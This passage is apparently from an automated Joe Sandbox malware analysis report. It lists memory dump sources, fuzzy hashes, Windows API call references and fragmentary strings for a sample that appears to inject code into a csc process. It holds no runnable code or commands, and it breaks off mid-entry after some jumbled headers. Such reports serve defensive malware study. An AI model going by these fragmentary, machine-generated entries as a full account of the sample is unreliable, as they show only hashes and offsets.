                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpen
                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                              • API String ID: 47109696-1023437679
                                                                                                                                              • Opcode ID: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                                              • Instruction ID: 0f0fbff194b733e9befad18985cc3632bf2348863539eaefa16bfffbd4cac233
                                                                                                                                              • Opcode Fuzzy Hash: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                                              • Instruction Fuzzy Hash: 78E0EC75504310AFD370DF58EC49F87BBE8EF4A750F01881EB889D3250D6749840CBA5
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 0042C78D
                                                                                                                                                • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000020,004252A6,?,0044C9A0,0000000C,0041AB0C,00000000,?,?,00446A11,004044BD), ref: 0042C798
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterSection$__lock
                                                                                                                                              • String ID: `jE
                                                                                                                                              • API String ID: 3410214836-775037952
                                                                                                                                              • Opcode ID: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                                              • Instruction ID: e25f03711a34877e1c848d10ee6b2a6bf970461377bf0363c61bc6c07be673b1
                                                                                                                                              • Opcode Fuzzy Hash: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                                              • Instruction Fuzzy Hash: 9BD022B6B0010203DF282676EEC950E3208D2823037EA8C3BF802C3282CF2CDD80840D
                                                                                                                                              APIs
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?), ref: 00429C86
                                                                                                                                              • HeapAlloc.KERNEL32(00000008,000041C4), ref: 00429CBF
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00429CDD
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00429CF4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocHeap$FreeVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3499195154-0
                                                                                                                                              • Opcode ID: ea70e5c13c1f21d78355e85d9dd63a5838c77a33c2fad09f6ad6cd3bd0747de8
                                                                                                                                              • Instruction ID: dfb89f136970734709b6813ad249d643eab4b97aebf48e034e9fa728ed28f66c
                                                                                                                                              • Opcode Fuzzy Hash: ea70e5c13c1f21d78355e85d9dd63a5838c77a33c2fad09f6ad6cd3bd0747de8
                                                                                                                                              • Instruction Fuzzy Hash: 0F116D302006019FD7328F29FD45A2A7BF6FB86764B60492EF256D31B1C3B09846DF18
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443862
                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443874
                                                                                                                                              • LeaveCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 0044387D
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D), ref: 0044388F
                                                                                                                                                • Part of subcall function 004437CB: InitializeCriticalSection.KERNEL32(00480774,00443842,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D,?,0047EA90), ref: 004437E3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 713024617-0
                                                                                                                                              • Opcode ID: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                                              • Instruction ID: 3b45dfc569fa32815649505fb739a58a282b546805a0b9d948b316ba2df3f3b5
                                                                                                                                              • Opcode Fuzzy Hash: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                                              • Instruction Fuzzy Hash: 82F06D7101020ADFE750AF94EC84A5AF3ACFB15716F00083BE14083011D738F658CBA8

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:7.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:17
                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,aq$4$T'[$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                              • API String ID: 0-2585721871
                                                                                                                                              • Opcode ID: 4f1e25b67b5ade2257d00d0c31f042960915d07883b3ab3a7b7ea25db23bffa0
                                                                                                                                              • Instruction ID: ace9342b87d7e4529518a2c8b3957e24970e28cf3a2cda74f2263a19a2cf963f
                                                                                                                                              • Opcode Fuzzy Hash: 4f1e25b67b5ade2257d00d0c31f042960915d07883b3ab3a7b7ea25db23bffa0
                                                                                                                                              • Instruction Fuzzy Hash: 84B22634A002188FDB14CFA9C895BADB7BAFF88700F558599E545AB3A5DB70EC81CF50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,aq$4$T'[$$]q$$]q$$]q$$]q
                                                                                                                                              • API String ID: 0-3939105665
                                                                                                                                              • Opcode ID: 74bf1a2e3ef6e3d4c555f5f8e8f4ec6601fabdba202e956533c48c39885f2458
                                                                                                                                              • Instruction ID: f01b99420dfee68f088ec00e3a2edbc10e85675c132943eb0d41152af47560b5
                                                                                                                                              • Opcode Fuzzy Hash: 74bf1a2e3ef6e3d4c555f5f8e8f4ec6601fabdba202e956533c48c39885f2458
                                                                                                                                              • Instruction Fuzzy Hash: A0221A34A00219CFDB64CF69C995BADB7B6FF48300F5481A9E549AB3A5DB30AD81CF50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 2
                                                                                                                                              • API String ID: 0-450215437
                                                                                                                                              • Opcode ID: d141d561ca2a483fb5941f8af851b78596a0400db4ef9affc1d3b85318774d43
                                                                                                                                              • Instruction ID: 5c9d716a091f0466be2b638ccad954230c5e62727ef18060ba453b2722541700
                                                                                                                                              • Opcode Fuzzy Hash: d141d561ca2a483fb5941f8af851b78596a0400db4ef9affc1d3b85318774d43
                                                                                                                                              • Instruction Fuzzy Hash: 6B525C70A012458FCB59EF69C990B9DBBF2BF89300F1084A9E50ADB3A5EB359D44CF51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8d01e39757584b653ddd40a927827b961982278087ffb23d919019b9da8acc6d
                                                                                                                                              • Instruction ID: b336a90c4bac7b82800f09f8becba7cb68b81a71c07bfa5d248fa20a00cdb273
                                                                                                                                              • Opcode Fuzzy Hash: 8d01e39757584b653ddd40a927827b961982278087ffb23d919019b9da8acc6d
                                                                                                                                              • Instruction Fuzzy Hash: 6FF14874A00224CFCB58DF29C994AA8B7F6BF88300F5585D9D91A9B365DB31ED82CF40

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (_]q$HD[$TC[$h3[$h3[$l0[$p1[$t/[$t/[$t2[$|.[$$]q$8[$9[
                                                                                                                                              • API String ID: 0-45626090
                                                                                                                                              • Opcode ID: f85b5ca3f868ce666a72ffaf11045b80418dd6de9209d71efb5d139de9287eea
                                                                                                                                              • Instruction ID: 992e94f60f5c947b6eb2f928f4d9da86e22607868479056471e089d1d8739a18
                                                                                                                                              • Opcode Fuzzy Hash: f85b5ca3f868ce666a72ffaf11045b80418dd6de9209d71efb5d139de9287eea
                                                                                                                                              • Instruction Fuzzy Hash: 0C02E0307042428FDB999F29C89176E7BF6FF95300F66846DE582DB3A1DA34CC4187A6

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$4c]q$4c]q$4c]q$4c]q$Haq
                                                                                                                                              • API String ID: 0-535247161
                                                                                                                                              • Opcode ID: 02bcc32273e64230ae0aff903f3e604b8c456f4b4a658012cca069ea40e8880c
                                                                                                                                              • Instruction ID: 68777141ed36b52593199691bf1d0d3c01772d8ffb3beab8062a91d04982f6d1
                                                                                                                                              • Opcode Fuzzy Hash: 02bcc32273e64230ae0aff903f3e604b8c456f4b4a658012cca069ea40e8880c
                                                                                                                                              • Instruction Fuzzy Hash: 02E16F75E00208DFCB54DFA9D584A9EBBF6FF88310F248569E815AB350DB30AD46CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$(aq$<5[$<5[$Haq$l`[
                                                                                                                                              • API String ID: 0-1051239135
                                                                                                                                              • Opcode ID: 2f6175bf650d1e037339c98b247b58953bf67342a91237f0d58e1386ef19d9ba
                                                                                                                                              • Instruction ID: b0ecb4cff14c1c70054f778e0e6af3c1feddf9c45744c4f433ec2851661ea37e
                                                                                                                                              • Opcode Fuzzy Hash: 2f6175bf650d1e037339c98b247b58953bf67342a91237f0d58e1386ef19d9ba
                                                                                                                                              • Instruction Fuzzy Hash: D1F14234A00209DFCB44EFA4D59499EBBB6FF89300F51C569E406AB3A5DB31EC46CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$@r[$l`[$l`[
                                                                                                                                              • API String ID: 0-2887531262
                                                                                                                                              • Opcode ID: 327f5331f2ba298517800a78576bef68830909a882d7f7bbb6cd95698b3a5ec6
                                                                                                                                              • Instruction ID: efd595eae718d1939a82d80d29500ae6cdf3b4c1516848293d60f88b23952ca8
                                                                                                                                              • Opcode Fuzzy Hash: 327f5331f2ba298517800a78576bef68830909a882d7f7bbb6cd95698b3a5ec6
                                                                                                                                              • Instruction Fuzzy Hash: 8EC1C874A01218DFCB08DFA9D994AADB7B6FF89300F508158E506AB3A4DB71AC42CF51

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $Haq$Haq$Haq
                                                                                                                                              • API String ID: 0-432640594
                                                                                                                                              • Opcode ID: 693d41ee7c2d10857232fd04b1f7716968f1fe051d39db6089f6f210bd081d7f
                                                                                                                                              • Instruction ID: 56630481cb922660d1a3de98190fc0618a78922d6c6513f16246db4b79092aa0
                                                                                                                                              • Opcode Fuzzy Hash: 693d41ee7c2d10857232fd04b1f7716968f1fe051d39db6089f6f210bd081d7f
                                                                                                                                              • Instruction Fuzzy Hash: 0A328D30A10249CFCB64EF68D4546AEBBF2FF94310F108469E916AB3A1DF359D46CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$4']q$l`[
                                                                                                                                              • API String ID: 0-428766390
                                                                                                                                              • Opcode ID: 1dcd415c19915c2a8c05ebd7645cbcbb01455eac01bb90a6beb8e22aaae3e181
                                                                                                                                              • Instruction ID: f17caf9997f36e189531c688156379abe08321680c600943337a542e71826835
                                                                                                                                              • Opcode Fuzzy Hash: 1dcd415c19915c2a8c05ebd7645cbcbb01455eac01bb90a6beb8e22aaae3e181
                                                                                                                                              • Instruction Fuzzy Hash: B8F1DB34B00218DFCB08EFA5D994A9DBBB6FF88301F518158E506AB3A5DB71EC46CB51

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4c]q$4c]q$4c]q$Haq
                                                                                                                                              • API String ID: 0-1741209197
                                                                                                                                              • Opcode ID: c12c9b52be104b413cdf7a1c822a29b2c6edce137e37561a8714bb910e58e644
                                                                                                                                              • Instruction ID: 12b9c6db33ae276b4609e8d93c5c6bdfaeb3edf6a7648c15546c58ae4508fabc
                                                                                                                                              • Opcode Fuzzy Hash: c12c9b52be104b413cdf7a1c822a29b2c6edce137e37561a8714bb910e58e644
                                                                                                                                              • Instruction Fuzzy Hash: CEB1E631A10205DFCF24CF68D8505ADB7B1FF89314F248669D90AAB3A1EB31ED46CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$,aq$HK[$|L[
                                                                                                                                              • API String ID: 0-77667497
                                                                                                                                              • Opcode ID: 9600797beb984e5ab089bb4d200316fd1593ea5db69ae62dcec20a3f84177439
                                                                                                                                              • Instruction ID: c9a2d974c5f3d52ebe4eabc7e34657f639f470c905376d6c9f751ffe9bc44a3b
                                                                                                                                              • Opcode Fuzzy Hash: 9600797beb984e5ab089bb4d200316fd1593ea5db69ae62dcec20a3f84177439
                                                                                                                                              • Instruction Fuzzy Hash: 5041D3327040596F8F019EAA9C509FF7FFEEF89210B14406AFA45D3251CA25CD1597A0

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0o@p$Dq@p$Lj@p$Lj@p
                                                                                                                                              • API String ID: 0-4286108749
                                                                                                                                              • Opcode ID: 6557b0c237cbae3b7c3a10b0587014807718334988fec2e6aa053c19f5153903
                                                                                                                                              • Instruction ID: f9ba2739dde39543a13adcb6f7bec52c6372eda6cf39194e8d614f6ad6022c69
                                                                                                                                              • Opcode Fuzzy Hash: 6557b0c237cbae3b7c3a10b0587014807718334988fec2e6aa053c19f5153903
                                                                                                                                              • Instruction Fuzzy Hash: 69415C35720110DFCB68DB69D8A4A6D77F2FF88620B1184A9E906EB771DB35EC06CB50

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$x^[$x^[$x^[
                                                                                                                                              • API String ID: 0-451525180
                                                                                                                                              • Opcode ID: 3f7f72509771ffb2d0983fd64cdd49d88c33c4441befe4a27c8aa679dae6118e
                                                                                                                                              • Instruction ID: 0c24e0b455547a738f627bf9c37022b1c9b2e9a72d660480d13931cec5695848
                                                                                                                                              • Opcode Fuzzy Hash: 3f7f72509771ffb2d0983fd64cdd49d88c33c4441befe4a27c8aa679dae6118e
                                                                                                                                              • Instruction Fuzzy Hash: 5631AE327002049FCF49DFA4D85499ABBB6FF88310F1584A9F50AAB271DA31DC02CB91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$l`[
                                                                                                                                              • API String ID: 0-1508184152
                                                                                                                                              • Opcode ID: c0adc2be3ca548c08bff35561f1a72638266aeff77b0e3c38f92d0bbc4b65fea
                                                                                                                                              • Instruction ID: c8f08a7b49702100615d75ea54dace327c667f216eb426d8873cd172a0249bd7
                                                                                                                                              • Opcode Fuzzy Hash: c0adc2be3ca548c08bff35561f1a72638266aeff77b0e3c38f92d0bbc4b65fea
                                                                                                                                              • Instruction Fuzzy Hash: 86C1C974B01218DFCB08DFA5D994AADB7B6FF89300F508169E506AB3A4DB71AC42CF51
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994505916.00000000095C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95c0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q
                                                                                                                                              • API String ID: 0-3120983240
                                                                                                                                              • Opcode ID: a7769f13cc47d58201adf3d2736099788328ce02f30d4d38d9d3bbb60766ff24
                                                                                                                                              • Instruction ID: 408bdaf78190e8f6a5fbf20750f93c1014d8f9ae37376d5b6b6616fa8e64cb75
                                                                                                                                              • Opcode Fuzzy Hash: a7769f13cc47d58201adf3d2736099788328ce02f30d4d38d9d3bbb60766ff24
                                                                                                                                              • Instruction Fuzzy Hash: 070281B0B00315CF8EA56ABB586823B69DABBC5750F15052EE907D73C8DF64CC4587B2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (_]q$SY
                                                                                                                                              • API String ID: 0-3179355067
                                                                                                                                              • Opcode ID: ef8c592534ee51d3f95c9b69f06a20032ccd66a135714bf7ec4fd15dd9888b67
                                                                                                                                              • Instruction ID: 2d589b411da5ec4a1454390ce93a3163de50fefaf2d7b6cdbff2e21932e0489a
                                                                                                                                              • Opcode Fuzzy Hash: ef8c592534ee51d3f95c9b69f06a20032ccd66a135714bf7ec4fd15dd9888b67
                                                                                                                                              • Instruction Fuzzy Hash: 9F227B35B002149FDB44DFA9C891A6DB7F6FF88310F558569E905EB3A5CA71EC80CBA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $]q$$]q
                                                                                                                                              • API String ID: 0-127220927
                                                                                                                                              • Opcode ID: 5f81fe24e1ae8f4bf93a5b0560679a1536ac125f6a59186d63d522006bf314a8
                                                                                                                                              • Instruction ID: 6428a96e83b19f07355a1f52ce60e67b474fe120b7fca7d5d80c6d6fb3f9282a
                                                                                                                                              • Opcode Fuzzy Hash: 5f81fe24e1ae8f4bf93a5b0560679a1536ac125f6a59186d63d522006bf314a8
                                                                                                                                              • Instruction Fuzzy Hash: 55228D31F002198FCF15CFAAD855AADBBB5FF48700F548025E961AB394DB38A946CB91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994505916.00000000095C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95c0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q
                                                                                                                                              • API String ID: 0-3120983240
                                                                                                                                              • Opcode ID: eef2f8a2c0790a7394cdf2e516f9593f76e9bcbacb9b1735b9800644a8956196
                                                                                                                                              • Instruction ID: af234af9dae14e4befef573cf9dc60ce5fbbc5c9c3f7bce00c74188050385969
                                                                                                                                              • Opcode Fuzzy Hash: eef2f8a2c0790a7394cdf2e516f9593f76e9bcbacb9b1735b9800644a8956196
                                                                                                                                              • Instruction Fuzzy Hash: 6CC129B4B00206CF8F99ABB6946913EB6E7BBC5341B29442DE917D33C4EF348C069752
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$l`[
                                                                                                                                              • API String ID: 0-3387854408
                                                                                                                                              • Opcode ID: 3d79db0cf533291c62bf6628fdc87965c87e967e55ab69d83428ab1d56a6c9d5
                                                                                                                                              • Instruction ID: 60b98de08687291c437172e660a323319a119754e1315667cb9beabbcaca5b8a
                                                                                                                                              • Opcode Fuzzy Hash: 3d79db0cf533291c62bf6628fdc87965c87e967e55ab69d83428ab1d56a6c9d5
                                                                                                                                              • Instruction Fuzzy Hash: 4EA1ED34A10218DFCB08EFA5D894A9DBBB2FF88310F55C159E406AB365DB71EC46CB91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: l`[$l`[
                                                                                                                                              • API String ID: 0-2812091460
                                                                                                                                              • Opcode ID: 8bae239a39b8a1e3f2879e6da788ab5110e4c69985e425fda889abdcd9aed4ef
                                                                                                                                              • Instruction ID: 9c32cc75e465509c50bd678ab56730e68d157113902dc516a7641738fcf43c91
                                                                                                                                              • Opcode Fuzzy Hash: 8bae239a39b8a1e3f2879e6da788ab5110e4c69985e425fda889abdcd9aed4ef
                                                                                                                                              • Instruction Fuzzy Hash: 5A812934B006089FCB15EFA9C454BADB7B6BF88304F54C569E4029B3A1DB76EC46CB90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$Haq
                                                                                                                                              • API String ID: 0-3785302501
                                                                                                                                              • Opcode ID: 39f8a0ab9fb808a62576729099017656365c338c90d178664b503a41e521fe13
                                                                                                                                              • Instruction ID: 4e7f89653067bdb92b7a43f224094bd8c0a17ea0d41b03586e46fa80e6858b52
                                                                                                                                              • Opcode Fuzzy Hash: 39f8a0ab9fb808a62576729099017656365c338c90d178664b503a41e521fe13
                                                                                                                                              • Instruction Fuzzy Hash: 33610F303002858FCB699F39C8547AF7BE6AF81300F1585ADE496CB2A5DE74DD05CB91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95c0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a3ef5b4b3ad77928b70afe6edd2fa8d7a742ef8bdbb9127133f935c93ab76653
                                                                                                                                              • Instruction ID: 42845ceae84c6648b47e338a863bf9a8aa8ce8e3a16e00eb4861c9632ae0f359
